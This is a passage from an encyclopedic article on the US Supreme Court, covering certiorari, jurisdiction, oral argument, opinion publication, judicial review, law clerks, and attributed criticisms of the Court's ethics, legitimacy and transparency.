justice to issue a stay pending certiorari in 28 U.S.C. § 2101(f). Each justice also decides routine procedural requests, such as for extensions of time. Before 1990, the rules of the Supreme Court also stated that "a writ of injunction may be granted by any Justice in a case where it might be granted by the Court." 192 However, this part of the rule (and all other specific mention of injunctions) was removed in the Supreme Court's rules revision of December 1989. 193 194 Nevertheless, requests for injunctions under the All Writs Act are sometimes directed to the circuit justice. In the past, circuit justices also sometimes granted motions for bail in criminal cases, writs of habeas corpus, and applications for writs of error granting permission to appeal. 195 A circuit justice may sit as a judge on the Court of Appeals of that circuit, but over the past hundred years, this has rarely occurred. A circuit justice sitting with the Court of Appeals has seniority over the chief judge of the circuit.
196 The chief justice has traditionally been assigned to the District of Columbia Circuit, the Fourth Circuit (which includes Maryland and Virginia, the states surrounding the District of Columbia), and since it was established, the Federal Circuit. Each associate justice is assigned to one or two judicial circuits. As of September 28, 2022, the allotment of the justices among the circuits is as follows: 197 Five of the current justices are assigned to circuits on which they previously sat as circuit judges: Chief Justice Roberts (D.C. Circuit), Justice Sotomayor (Second Circuit), Justice Alito (Third Circuit), Justice Barrett (Seventh Circuit), and Justice Gorsuch (Tenth Circuit). Nearly all cases come before the court by way of petitions for writs of certiorari, commonly referred to as cert, upon which the court grants a writ of certiorari. The court may review via this process any civil or criminal case in the federal courts of appeals. 198 It may also review by certiorari a final judgment of the highest court of a state if the judgment involves a question of federal statutory or constitutional law. 199 A case may alternatively come before the court as a direct appeal from a three-judge federal district court. 200 The party that petitions the court for review is the petitioner and the non-mover is the respondent. Case names before the court are styled petitioner v. respondent, regardless of which party initiated the lawsuit in the trial court. For example, criminal prosecutions are brought in the name of the state and against an individual, as in State of Arizona v. Ernesto Miranda. If the defendant is convicted, and his conviction then is affirmed on appeal in the state supreme court, when he petitions for cert the name of the case becomes Miranda v. Arizona. The court also hears questions submitted to it by appeals courts themselves via a process known as certification. 198 The Supreme Court relies on the record assembled by lower courts for the facts of a case and deals solely with the question of how the law applies to the facts presented. There are however situations where the court has original jurisdiction, such as when two states have a dispute against each other, or when there is a dispute between the United States and a state. In such instances, a case is filed with the Supreme Court directly. Examples of such cases include United States v. Texas, a case to determine whether a parcel of land belonged to the United States or to Texas, and Virginia v. Tennessee, a case turning on whether an incorrectly drawn boundary between two states can be changed by a state court, and whether the setting of the correct boundary requires Congressional approval. Although it has not happened since 1794 in the case of Georgia v. Brailsford, 201 parties in an action at law in which the Supreme Court has original jurisdiction may request that a jury determine issues of fact. 202 Georgia v. Brailsford remains the only case in which the court has empaneled a jury, in this case a special jury. 203 Two other original jurisdiction cases involve colonial era borders and rights under navigable waters in New Jersey v. Delaware, and water rights between riparian states upstream of navigable waters in Kansas v. Colorado. A cert petition is voted on at a session of the court called conference. A conference is a private meeting of the nine justices by themselves; the public and the justices' clerks are excluded. The rule of four permits four of the nine justices to grant a writ of certiorari. 
If it is granted, the case proceeds to the briefing stage; otherwise, the case ends. Except in death penalty cases and other cases in which the court orders briefing from the respondent, the respondent may, but is not required to, file a response to the cert petition. The court grants a petition for cert only for "compelling reasons", spelled out in the court's Rule 10. Such reasons include: When a conflict of interpretations arises from differing interpretations of the same law or constitutional provision issued by different federal circuit courts of appeals, lawyers call this situation a "circuit split"; if the court votes to deny a cert petition, as it does in the vast majority of such petitions that come before it, it does so typically without comment. A denial of a cert petition is not a judgment on the merits of a case, and the decision of the lower court stands as the case's final ruling. To manage the high volume of cert petitions received by the court each year (of the more than 7,000 petitions the court receives each year, it will usually request briefing and hear oral argument in 100 or fewer), the court employs an internal case management tool known as the "cert pool"; currently, all justices except for Justices Alito and Gorsuch participate in the cert pool. 204 205 206 207 The Court also relies on and cites amicus briefs, law review articles, and other written works for their decisions. While law review article use has increased slightly with one article cited per decision on average, 208 the use of amicus briefs has increased significantly. 209 The use of amicus briefs has received criticism, including the ability of authors to discuss topics outside their expertise (unlike in lower courts), 209 with documented examples of falsehoods in written opinions, often supplied to the justices by amicus briefs from groups advocating a particular outcome. 210 The lack of funding transparency and the lack of a requirement to submit them earlier in the process also make it more difficult to fact-check and understand the credibility of amicus briefs. 209 When the court grants a cert petition, the case is set for oral argument. Both parties will file briefs on the merits of the case, as distinct from the reasons they may have argued for granting or denying the cert petition. With the consent of the parties or approval of the court, amici curiae, or "friends of the court", may also file briefs. The court holds two-week oral argument sessions each month from October through April. Each side has thirty minutes to present its argument (the court may choose to give more time, although this is rare), 211 and during that time, the justices may interrupt the advocate and ask questions. In 2019, the court adopted a rule generally allowing advocates to speak uninterrupted for the first two minutes of their argument. 212 The petitioner gives the first presentation, and may reserve some time to rebut the respondent's arguments after the respondent has concluded. Amici curiae may also present oral argument on behalf of one party if that party agrees. The court advises counsel to assume that the justices are familiar with and have read the briefs filed in a case. At the conclusion of oral argument, the case is submitted for decision. Cases are decided by majority vote of the justices. After the oral argument is concluded, usually in the same week as the case was submitted, the justices retire to another conference at which the preliminary votes are tallied and the court sees which side has prevailed. 
One of the justices in the majority is then assigned to write the court's opinion, also known as the "majority opinion", an assignment made by the most senior justice in the majority, with the chief justice always being considered the most senior. Drafts of the court's opinion circulate among the justices until the court is prepared to announce the judgment in a particular case. 213 Justices are free to change their votes on a case up until the decision is finalized and published. In any given case, a justice is free to choose whether or not to author an opinion or else simply join the majority or another justice's opinion. There are several primary types of opinions. It is the court's practice to issue decisions in all cases argued in a particular term by the end of that term. Within that term, the court is under no obligation to release a decision within any set time after oral argument. Since recording devices are banned inside the courtroom of the Supreme Court Building, the delivery of the decision to the media has historically been done via paper copies in what was known as the "Running of the Interns". 214 However, this practice has become passé, as the Court now posts electronic copies of the opinions on its website as they are being announced. 215 It is possible that through recusals or vacancies the court divides evenly on a case. If that occurs, then the decision of the court below is affirmed, but does not establish binding precedent. In effect, it results in a return to the status quo ante. For a case to be heard, there must be a quorum of at least six justices. 216 If a quorum is not available to hear a case and a majority of qualified justices believes that the case cannot be heard and determined in the next term, then the judgment of the court below is affirmed as if the court had been evenly divided. For cases brought to the Supreme Court by direct appeal from a United States District Court, the chief justice may order the case remanded to the appropriate U.S. Court of Appeals for a final decision there. 217 This has only occurred once in U.S. history, in the case of United States v. Alcoa (1945). 218 The court's opinions are published in three stages. First, a slip opinion is made available on the court's website and through other outlets. Next, several opinions and lists of the court's orders are bound together in paperback form, called a preliminary print of United States Reports, the official series of books in which the final version of the court's opinions appears. About a year after the preliminary prints are issued, a final bound volume of U.S. Reports is issued by the Reporter of Decisions. The individual volumes of U.S. Reports are numbered so that users may cite this set of reports (or a competing version published by another commercial legal publisher but containing parallel citations) to allow those who read their pleadings and other briefs to find the cases quickly and easily. As of March 2012, the U.S. Reports had published a total of 30,161 Supreme Court opinions, covering the decisions handed down from February 1790 to March 2012. This figure does not reflect the number of cases the court has taken up, as several cases can be addressed by a single opinion (see, for example, Parents v. Seattle, where Meredith v. Jefferson County Board of Education was also decided in the same opinion; by a similar logic, Miranda v. Arizona actually decided not only Miranda but also three other cases: Vignera v.
New York, Westover v. United States, and California v. Stewart). A more unusual example is The Telephone Cases, which are a single set of interlinked opinions that take up the entire 126th volume of the U.S. Reports. Opinions are also collected and published in two unofficial, parallel reporters: Supreme Court Reporter, published by West (now a part of Thomson Reuters), and United States Supreme Court Reports, Lawyers' Edition (simply known as Lawyers' Edition), published by LexisNexis. In court documents, legal periodicals and other legal media, case citations generally contain cites from each of the three reporters; for example, citation to Citizens United v. Federal Election Commission is presented as Citizens United v. Federal Election Com'n, 558 U.S. 310, 130 S. Ct. 876, 175 L. Ed. 2d 753 (2010), with "S. Ct." representing the Supreme Court Reporter, and "L. Ed." representing the Lawyers' Edition. 222 223 Lawyers use an abbreviated format to cite cases, in the form "vol U.S. page, pin (year)", where vol is the volume number, page is the page number on which the opinion begins, and year is the year in which the case was decided. Optionally, pin is used to "pinpoint" to a specific page number within the opinion. For instance, the citation for Roe v. Wade is 410 U.S. 113 (1973), which means the case was decided in 1973 and appears on page 113 of volume 410 of U.S. Reports. For opinions or orders that have not yet been published in the preliminary print, the volume and page numbers may be replaced with blanks (___). In order to plead before the court, an attorney must first be admitted to the court's bar. Approximately 4,000 lawyers join the bar each year. The bar contains an estimated 230,000 members. In reality, pleading is limited to several hundred attorneys. The rest join for a one-time fee of $200, with the court collecting about $750,000 annually. Attorneys can be admitted as either individuals or as groups. The group admission is held before the current justices of the Supreme Court, wherein the chief justice approves a motion to admit the new attorneys. 224 Lawyers commonly apply for the cosmetic value of a certificate to display in their office or on their résumé. They also receive access to better seating if they wish to attend an oral argument. 225 Members of the Supreme Court Bar are also granted access to the collections of the Supreme Court Library. 226 A term of the Supreme Court commences on the first Monday of each October, and continues until June or early July of the following year. Each term consists of alternating periods of around two weeks known as "sittings" and "recesses"; justices hear cases and deliver rulings during sittings, and discuss cases and write opinions during recesses. 227 The federal court system and the judicial authority to interpret the Constitution received little attention in the debates over the drafting and ratification of the Constitution. The power of judicial review, in fact, is nowhere mentioned in it. Over the ensuing years, attempts to settle whether the power of judicial review was even intended by the drafters of the Constitution were quickly frustrated by the lack of evidence bearing on the question either way. 228 Nevertheless, the power of the judiciary to overturn laws and executive actions it determines are unlawful or unconstitutional is a well-established precedent. Many of the Founding Fathers accepted the notion of judicial review; in Federalist No.
78, Alexander Hamilton wrote: "A Constitution is, in fact, and must be regarded by the judges, as a fundamental law. It therefore belongs to them to ascertain its meaning, and the meaning of any particular act proceeding from the legislative body. If there should happen to be an irreconcilable variance between the two, that which has the superior obligation and validity ought, of course, to be preferred; or, in other words, the Constitution ought to be preferred to the statute." The Supreme Court established its own power to declare laws unconstitutional in Marbury v. Madison (1803), consummating the American system of checks and balances. In explaining the power of judicial review, Chief Justice John Marshall stated that the authority to interpret the law was the particular province of the courts, part of the duty of the judicial department to say what the law is. His contention was not that the court had privileged insight into constitutional requirements, but that it was the constitutional duty of the judiciary, as well as the other branches of government, to read and obey the dictates of the Constitution. 228 This decision was criticized by then-President Thomas Jefferson, who said, "the Constitution, on this hypothesis, is a mere thing of wax in the hands of the judiciary, which they may twist and shape into any form they please." 229 Since the founding of the republic, there has been a tension between the practice of judicial review and the democratic ideals of egalitarianism, self-government, self-determination and freedom of conscience. At one pole are those who view the federal judiciary and especially the Supreme Court as being "the most separated and least checked of all branches of government." 230 Indeed, federal judges and justices on the Supreme Court are not required to stand for election by virtue of their tenure "during good behavior", and their pay may "not be diminished" while they hold their position (Section 1 of Article Three). Although subject to the process of impeachment, only one justice has ever been impeached and no Supreme Court justice has been removed from office. At the other pole are those who view the judiciary as the least dangerous branch, with little ability to resist the exhortations of the other branches of government. 228 The Supreme Court cannot directly enforce its rulings; instead, it relies on respect for the Constitution and for the law for adherence to its judgments. One notable instance of nonacquiescence came in 1832, when the state of Georgia ignored the Supreme Court's decision in Worcester v. Georgia. President Andrew Jackson, who sided with the Georgia courts, is supposed to have remarked, "John Marshall has made his decision; now let him enforce it!" 231 Some state governments in the South also resisted the desegregation of public schools after the 1954 judgment Brown v. Board of Education. More recently, many feared that President Nixon would refuse to comply with the court's order in United States v. Nixon (1974) to surrender the Watergate tapes. 232 Nixon ultimately complied with the Supreme Court's ruling. 233 Supreme Court decisions can be purposefully overturned by constitutional amendment, something that has happened on six occasions. 234 When the court rules on matters involving the interpretation of laws rather than of the Constitution, simple legislative action can reverse the decisions (for example, in 2009 Congress passed the Lilly Ledbetter Fair Pay Act of 2009, superseding the limitations given in Ledbetter v.
Goodyear Tire & Rubber Co. in 2007). Also, the Supreme Court is not immune from political and institutional consideration: lower federal courts and state courts sometimes resist doctrinal innovations, as do law enforcement officials. 235 In addition, the other two branches can restrain the court through other mechanisms. Congress can increase the number of justices, giving the president power to influence future decisions by appointments (as in Roosevelt's court-packing plan discussed above). Congress can pass legislation that restricts the jurisdiction of the Supreme Court and other federal courts over certain topics and cases: this is suggested by language in Section 2 of Article Three, where the appellate jurisdiction is granted "with such Exceptions, and under such Regulations as the Congress shall make." The court sanctioned such congressional action in the Reconstruction Era case Ex parte McCardle (1869), although it rejected Congress' power to dictate how particular cases must be decided in United States v. Klein (1871). 236 On the other hand, through its power of judicial review, the Supreme Court has defined the scope and nature of the powers and separation between the legislative and executive branches of the federal government; for example, in United States v. Curtiss-Wright Export Corp. (1936), Dames & Moore v. Regan (1981), and notably in Goldwater v. Carter (1979), which effectively gave the presidency the power to terminate ratified treaties without the consent of Congress. The court's decisions can also impose limitations on the scope of Executive authority, as in Humphrey's Executor v. United States (1935), the Steel Seizure Case (1952), and United States v. Nixon (1974). Each Supreme Court justice hires several law clerks to review petitions for writ of certiorari, research them, prepare bench memoranda, and draft opinions. Associate justices are allowed four clerks. The chief justice is allowed five clerks, but Chief Justice Rehnquist hired only three per year, and Chief Justice Roberts usually hires only four. 237 Generally, law clerks serve a term of one to two years. The first law clerk was hired by Associate Justice Horace Gray in 1882. 237 238 Oliver Wendell Holmes Jr. and Louis Brandeis were the first Supreme Court justices to use recent law school graduates as clerks, rather than hiring "a stenographer-secretary." 239 Most law clerks are recent law school graduates. The first female clerk was Lucile Lomen, hired in 1944 by Justice William O. Douglas. 237 The first African-American clerk, William T. Coleman Jr., was hired in 1948 by Justice Felix Frankfurter. 237 A disproportionately large number of law clerks have obtained law degrees from elite law schools, especially Harvard, Yale, the University of Chicago, Columbia, and Stanford. From 1882 to 1940, 62% of law clerks were graduates of Harvard Law School. 237 Those chosen to be Supreme Court law clerks usually have graduated at the top of their law school class and were often an editor of the law review or a member of the moot court board. By the mid-1970s, clerking previously for a judge in a federal court of appeals had also become a prerequisite to clerking for a Supreme Court justice. Ten Supreme Court justices previously clerked for other justices: Byron White for Frederick M. Vinson, John Paul Stevens for Wiley Rutledge, William Rehnquist for Robert H.
Jackson, Stephen Breyer for Arthur Goldberg, John Roberts for William Rehnquist, Elena Kagan for Thurgood Marshall, Neil Gorsuch for both Byron White and Anthony Kennedy, Brett Kavanaugh also for Kennedy, Amy Coney Barrett for Antonin Scalia, and Ketanji Brown Jackson for Stephen Breyer. Justices Gorsuch and Kavanaugh served under Kennedy during the same term. Gorsuch is the first justice to clerk for and subsequently serve alongside the same justice, serving alongside Kennedy from April 2017 through Kennedy's retirement in 2018. With the confirmation of Justice Kavanaugh, for the first time a majority of the Supreme Court was composed of former Supreme Court law clerks (Roberts, Breyer, Kagan, Gorsuch and Kavanaugh, now joined by Barrett and Jackson). Several current Supreme Court justices have also clerked in the federal courts of appeals: John Roberts for Judge Henry Friendly of the United States Court of Appeals for the Second Circuit, Justice Samuel Alito for Judge Leonard I. Garth of the United States Court of Appeals for the Third Circuit, Elena Kagan for Judge Abner J. Mikva of the United States Court of Appeals for the District of Columbia Circuit, Neil Gorsuch for Judge David B. Sentelle of the United States Court of Appeals for the District of Columbia, Brett Kavanaugh for Judge Walter Stapleton of the United States Court of Appeals for the Third Circuit and Judge Alex Kozinski of the United States Court of Appeals for the Ninth Circuit, and Amy Coney Barrett for Judge Laurence Silberman of the U.S. Court of Appeals for the D.C. Circuit. Clerks hired by each of the justices of the Supreme Court are often given considerable leeway in the opinions they draft. "Supreme Court clerkship appeared to be a nonpartisan institution from the 1940s into the 1980s, according to a study published in 2009 by the law review of Vanderbilt University Law School. 240 241 "As law has moved closer to mere politics, political affiliations have naturally and predictably become proxies for the different political agendas that have been pressed in and through the courts, former federal court of appeals judge J. Michael Luttig said. 240 David J. Garrow, professor of history at the University of Cambridge, stated that the court had thus begun to mirror the political branches of government. "We are getting a composition of the clerk workforce that is getting to be like the House of Representatives, Professor Garrow said. "Each side is putting forward only ideological purists. 240 According to the Vanderbilt Law Review study, this politicized hiring trend reinforces the impression that the Supreme Court is "a superlegislature responding to ideological arguments rather than a legal institution responding to concerns grounded in the rule of law. 240 The following are some of the criticisms and controversies about the Court that are not discussed in previous sections. Unlike in most high courts, the United States Supreme Court has lifetime tenure, an unusual amount of power over elected branches of government, and a difficult constitution to amend. 242 These, among other factors, have been attributed by some critics to the Court's diminished stature abroad 243 and lower approval ratings at home, which have dropped from the mid 60s in the late 1980s to around 40% in the early 2020s. 
Additional factors cited by critics include the polarization of national politics, ethics scandals, and specific controversial partisan rulings, including the relaxation of campaign finance rules, 244 increased gerrymandering, 245 weakened voting rights, 246 Dobbs v. Jackson and Bush v. Gore. 247 The continued consolidation of power by the court and, as a result of its rulings, the Republican Party, has sparked debate over when democratic backsliding becomes entrenched single-party rule. 247 Public trust in the court peaked in the late 1980s. Since the 2022 Dobbs ruling that overturned Roe v. Wade and permitted states to restrict abortion rights, Democrats and independents have increasingly lost trust in the court, seen the court as political, and expressed support for reforming the institution. 248 Historically, the court had relatively more trust than other government institutions. 249 After recording recent high approval ratings in the late 1980s around 66% approval, 250 the court's ratings have declined to an average of around 40% between mid 2021 and February 2024. 251 The electoral college (which elects the President who nominates the justices) and the U.S. Senate which confirms the justices, have selection biases that favor rural states that tend to vote Republican, resulting in a conservative Supreme Court. 252 Ziblatt and Levitsky estimate that 3 or 4 of the seats held by conservative justices on the court would be held by justices appointed by a Democratic president if the Presidency and Senate were selected directly by the popular vote. 253 The three Trump appointees to the court were all nominated by a president who finished second in the popular vote and confirmed by Senators representing a minority of Americans. 254 In addition, Clarence Thomas' confirmation in 1991 and Merrick Garland's blocked confirmation in 2016 were both decided by senators representing a minority of Americans. 255 Greg Price also critiqued the Court as minority rule. 256 Moreover, the Federalist Society acted as a filter for judicial nominations during the Trump administration, 257 ensuring the latest conservative justices lean even further to the right. 252 86% of judges Trump appointed to circuit courts and the Supreme Court were Federalist Society members. 258 David Litt critiques it as "an attempt to impose rigid ideological dogma on a profession once known for intellectual freedom. 259 Kate Aronoff criticizes the donations from special interests like fossil fuel companies and other dark money groups to the Federalist Society and related organizations seeking to influence lawyers and Supreme Court Justices. 260 The 2016 stonewalling of Merrick Garland's confirmation and subsequent filling with Neil Gorsuch has been critiqued as a 'stolen seat' citing precedent from the 20th century of confirmations during election years, 261 262 while proponents cited three blocked nominations between 1844 and 1866. 263 In recent years, Democrats have accused Republican leaders such as Mitch McConnell of hypocrisy, as they were instrumental in blocking the nomination of Merrick, but then rushing through the appointment of Amy Coney Barrett, even though both vacancies occurred close to an election. 264 Ethical controversies have grown with reports of justices (and their close family members) accepting expensive gifts, travel, business deals, and speaking fees without oversight or recusals from cases that present conflicts of interest. 
265 266 267 268 269 270 271 Spousal income and connections to cases have been redacted from the Justices' ethical disclosure forms, 272 while justices, such as Samuel Alito and Clarence Thomas, failed to disclose many large financial gifts, including free vacations valued at as much as $500,000. 273 274 In 2024, Justices Alito and Thomas refused calls to recuse themselves from January 6th cases where their spouses have taken public stances or been involved in efforts to overturn the election. 275 276 277 278 The criticism intensified after the 2024 Trump v. United States decision granted broad immunity to presidents, with Representative Alexandria Ocasio-Cortez saying she would introduce impeachment articles when Congress is back in session. 279 On July 10, 2024, she filed Articles of Impeachment against Thomas and Alito, citing their "widely documented financial and personal entanglements." 280 281 282 283 As of late July 2024, nearly 1.4 million people had signed a moveon.org petition asking Congress to remove Justice Thomas. 284 285 President Biden proposed term limits for justices, an enforceable ethics code, and elimination of "immunity for crimes a former president committed while in office". 286 287 288 Yale professor of constitutional law Akhil Reed Amar wrote an op-ed for The Atlantic titled "Something Has Gone Deeply Wrong at the Supreme Court". 289 Other criticisms of the Court include its weakening of corruption laws, which affects branches beyond the judiciary, 290 291 and its citing of falsehoods in written opinions, often supplied to the justices by amicus briefs from groups advocating a particular outcome. 210 Allison Orr Larsen, Associate Dean at William & Mary Law School, wrote in Politico that the court should address this by requiring disclosure of all funders of amicus briefs and of the studies they cite, admitting only briefs that stay within the expertise of their authors (as is required in lower courts), and requiring that briefs be submitted much earlier in the process so the history and facts have time to be challenged and uncovered. 209 The Supreme Court Historical Society's controversies include fundraising by the Justices from corporations and wealthy donors apparently seeking access to the justices. 292 293 294 295 On November 13, 2023, the court issued its first-ever Code of Conduct for Justices of the Supreme Court of the United States to set "ethics rules and principles that guide the conduct of the Members of the Court." 296 297 The Code has been received by some as a significant first step 298 but does not address the ethics concerns of many notable critics, who found the Code to be a significantly weakened version of the rules for other federal judges, let alone those for the legislature and the executive branch, while also lacking an enforcement mechanism. 299 300 301 The Code's commentary denied past wrongdoing by saying that the Justices have largely abided by these principles and are simply publishing them now. 302 303 304 This has prompted some criticism that the court hopes to legitimize past and future scandals through this Code. 305 306 The ethics rules guiding the justices are set and enforced by the justices themselves, meaning the members of the court have no external checks on their behavior other than the impeachment of a justice by Congress. 307 308 Chief Justice Roberts refused to testify before the Senate Judiciary Committee in April 2023, reasserting his desire for the Supreme Court to continue to monitor itself despite mounting ethics scandals. 
309 Lower courts, by contrast, are disciplined according to the 1973 Code of Conduct for United States Judges, which is enforced by the Judicial Conduct and Disability Act of 1980. 307 Article III, Section 1 of the Constitution of the United States (1787) establishes that the justices hold their office during good behavior. Thus far only one justice (Associate Justice Samuel Chase in 1804) has ever been impeached, and none has ever been removed from office. 310 The lack of external enforcement of ethics or other conduct violations makes the Supreme Court an outlier relative to modern organizational best practices. 307 Reform legislation proposed in 2024 has been blocked by congressional Republicans. 278 Thomas Keck argues that because the Court has historically not served as a strong bulwark for democracy, the Roberts Court has the opportunity to go down in history as a defender of democracy. However, he believes that if the court shields Trump from criminal prosecution (after ensuring his access to the ballot), then the risks that come with an anti-democratic status quo of the current court will outweigh the dangers that come from court reform (including court packing). 311 Aziz Z. Huq points to the blocking of progress on democratizing institutions, the increasing disparity in wealth and power, and the empowerment of an authoritarian white nationalist movement as evidence that the Supreme Court has created a "permanent minority" incapable of being defeated democratically. 312 Slate published an op-ed on July 3, 2024, by Dahlia Lithwick and Mark Joseph Stern criticizing several recent decisions, stating: "The Supreme Court's conservative supermajority has, in recent weeks, restructured American democracy in the Republican Party's preferred image, fundamentally altering the balance of power between the branches and the citizens themselves.... In the course of its most recent term that conservative supermajority has created a monarchical presidency, awarding the chief executive near-insurmountable immunity from accountability for any and all crimes committed during a term in office. It has seized power from Congress, strictly limiting lawmakers' ability to write broad laws that tackle the major crises of the moment. And it has hobbled federal agencies' authority to apply existing statutes to problems on the ground, substituting the expert opinions of civil servants with the (often partisan) preferences of unelected judges. All the while, the court has placed itself at the apex of the state, agreeing to share power only with a strongman president who seeks to govern in line with the conservative justices' vision." 313 Some of the most notable historical decisions criticized for failing to protect individual rights include the Dred Scott decision (1857), which held that people of African descent could not be U.S. citizens or enjoy constitutionally protected rights and privileges, 314 Plessy v. Ferguson (1896), which upheld segregation under the doctrine of "separate but equal", 315 and the Civil Rights Cases (1883) and Slaughter-House Cases (1873), which all but undermined civil rights legislation enacted during the Reconstruction era. 316 However, others argue that the court is too protective of some individual rights, particularly those of people accused of crimes or in detention. For example, Chief Justice Warren Burger criticized the exclusionary rule, and Justice Scalia criticized Boumediene v. Bush for being too protective of the rights of Guantanamo detainees, arguing habeas corpus should be limited to sovereign territory. 
317 After Dobbs v. Jackson Women's Health Organization overturned nearly 50 years of precedent set by Roe v. Wade, some experts expressed concern that this may be the beginning of a rollback of individual rights that had been previously established under the substantive due process principle, in part because Justice Clarence Thomas wrote in his concurring opinion in Dobbs that the decision should prompt the court to reconsider all of the court's past substantive due process decisions. 318 Due process rights claimed to be at risk are: 318 Some experts such as Melissa Murray, law professor at N.Y.U. School of Law, have claimed that protections for interracial marriage, established in Loving v. Virginia (1967), may also be at risk. 319 Other experts such as Josh Blackman, law professor at South Texas College of Law Houston, argued that Loving actually relied more heavily upon Equal Protection Clause grounds than substantive due process. 320 Substantive due process has also been the primary vehicle used by the Supreme Court to incorporate the Bill of Rights against state and local governments. 321 Clarence Thomas referred to it as 'legal fiction, 322 preferring the Privileges or Immunities Clause for incorporating the Bill of Rights. 323 However, outside of Neil Gorsuch's commentary in Timbs v. Indiana, Thomas has received little support for this viewpoint. 324 better source needed The Supreme Court has been criticized for engaging in judicial activism. This criticism is leveled by those who believe the court should not interpret the law in any way besides through the lens of past precedent or Textualism. However, those on both sides of the political aisle often level this accusation at the court. The debate around judicial activism typically involves accusing the other side of activism, whilst denying that your own side engages in it. 325 326 Conservatives often cite the decision in Roe v. Wade (1973) as an example of liberal judicial activism. In its decision, the court legalized abortion on the basis of a "right to privacy" that they found inherent in the Due Process Clause of the Fourteenth Amendment. 327 Roe v. Wade was overturned nearly fifty years later by Dobbs v. Jackson (2022), ending the recognition of abortion access as a constitutional right and returning the issue of abortion back to the states. David Litt criticized the decision in Dobbs as activism on the part of the court's conservative majority because the court failed to respect past precedent, eschewing the principle of Stare decisis that usually guides the court's decisions. 328 The decision in Brown v. Board of Education, which banned racial segregation in public schools was also criticized as activist by conservatives Pat Buchanan, 329 Robert Bork 330 and Barry Goldwater. 331 More recently, Citizens United v. Federal Election Commission was criticized for expanding upon the precedent in First National Bank of Boston v. Bellotti (1978) that the First Amendment applies to corporations. 332 Foreign Policy writer Colm Quinn says that a criticism leveled at the court, as well as other American institutions, is that after two centuries they are beginning to look their age. He cites four features of the United States Supreme Court that make it different from high courts in other countries, and help explain why polarization is an issue in the United States court: 333 Adam Liptak wrote in 2008 that the court has declined in relevance in other constitutional courts. 
He cites factors like American exceptionalism, the relatively few updates to the constitution or the courts, the rightward shift of the court and the diminished stature of the United States abroad. 243 Michael Waldman argued that no other country gives its Supreme Court as much power. 334 Warren E. Burger, before becoming Chief Justice, argued that since the Supreme Court has such "unreviewable power", it is likely to "self-indulge itself", and unlikely to "engage in dispassionate analysis. 335 Larry Sabato wrote that the federal courts, and especially the Supreme Court, have excessive power. 100 Suja A. Thomas argues the Supreme Court has taken most of the constitutionally-defined power from juries in the United States for itself 336 thanks in part to the influence of legal elites and companies that prefer judges over juries 337 as well as the inability of the jury to defend its power. 338 Some members of Congress considered the results from the 2021 2022 term a shift of government power into the Supreme Court, and a "judicial coup". 339 The 2021 2022 term of the court was the first full term following the appointment of three judges by Republican president Donald Trump — Neil Gorsuch, Brett Kavanaugh, and Amy Coney Barrett — which created a six-strong conservative majority on the court. Subsequently, at the end of the term, the court issued a number of decisions that favored this conservative majority while significantly changing the landscape with respect to rights. These included Dobbs v. Jackson Women's Health Organization which overturned Roe v. Wade and Planned Parenthood v. Casey in recognizing abortion is not a constitutional right, New York State Rifle Pistol Association, Inc. v. Bruen which made public possession of guns a protected right under the Second Amendment, Carson v. Makin and Kennedy v. Bremerton School District which both weakened the Establishment Clause separating church and state, and West Virginia v. EPA which weakened the power of executive branch agencies to interpret their congressional mandate. 340 341 342 There has been debate throughout American history about the boundary between federal and state power. While Framers such as James Madison 343 and Alexander Hamilton 344 argued in The Federalist Papers that their then-proposed Constitution would not infringe on the power of state governments, 345 346 347 348 others argue that expansive federal power is good and consistent with the Framers' wishes. 349 The Tenth Amendment to the United States Constitution explicitly grants "powers not delegated to the United States by the Constitution, nor prohibited by it to the States, are reserved to the States respectively, or to the people. The court has been criticized for giving the federal government too much power to interfere with state authority. citation needed One criticism is that it has allowed the federal government to misuse the Commerce Clause by upholding regulations and legislation which have little to do with interstate commerce, but that were enacted under the guise of regulating interstate commerce; and by voiding state legislation for allegedly interfering with interstate commerce. For example, the Commerce Clause was used by the Fifth Circuit Court of Appeals to uphold the Endangered Species Act, thus protecting six endemic species of insect near Austin, Texas, despite the fact that the insects had no commercial value and did not travel across state lines; the Supreme Court let that ruling stand without comment in 2005. 
350 Chief Justice John Marshall asserted Congress's power over interstate commerce was "complete in itself, may be exercised to its utmost extent, and acknowledges no limitations, other than are prescribed in the Constitution. 351 Justice Alito said congressional authority under the Commerce Clause is "quite broad"; 352 modern-day theorist Robert B. Reich suggests debate over the Commerce Clause continues today. 351 Advocates of states' rights, such as constitutional scholar Kevin Gutzman, have also criticized the court, saying it has misused the Fourteenth Amendment to undermine state authority. Justice Brandeis, in arguing for allowing the states to operate without federal interference, suggested that states should be laboratories of democracy. 353 One critic wrote "the great majority of Supreme Court rulings of unconstitutionality involve state, not federal, law. 354 Others see the Fourteenth Amendment as a positive force that extends "protection of those rights and guarantees to the state level. 355 More recently, in Gamble v. United States, the Court examined the doctrine of "separate sovereigns", whereby a criminal defendant can be prosecuted in state court as well as federal court on separate charges for the same offense. 356 357 Some Court decisions have been criticized for injecting the court into the political arena, and deciding questions that are the purview of the elected branches of government. The Bush v. Gore decision, in which the Supreme Court intervened in the 2000 presidential election, awarding George W. Bush the presidency over Al Gore, received scrutiny as political based on the controversial justifications used by the five conservative justices to elevate a fellow conservative to the presidency. 358 359 360 361 362 The court has been criticized for keeping its deliberations hidden from public view. 363 364 For example, the increasing use of a 'shadow docket' facilitates the court making decisions in secret without knowing how each Justice came to their decision. 365 366 In 2024, after comparing the analysis of shadow-docket decisions to Kremlinology, Matt Ford called this trend of secrecy "increasingly troubling", arguing the court's power comes entirely from persuasion and explanation. 367 A 2007 review of Jeffrey Toobin's book compared the Court to a cartel where its inner-workings are mostly unknown, arguing this lack of transparency reduces scrutiny which hurts ordinary Americans who know little about the nine extremely consequential Justices. 358 A 2010 poll found that 61% of American voters agreed that televising Court hearings would "be good for democracy", and 50% of voters stated they would watch Court proceedings if they were televised. 368 369 Ian Millhiser of Vox speculates that the decades-long decline in cases heard could be due to the increasing political makeup of judges, that he says might be more interested in settling political disputes than legal ones. 370 British constitutional scholar Adam Tomkins sees flaws in the American system of having courts (and specifically the Supreme Court) act as checks on the Executive and Legislative branches; he argues that because the courts must wait, sometimes for years, for cases to navigate their way through the system, their ability to restrain other branches is severely weakened. 
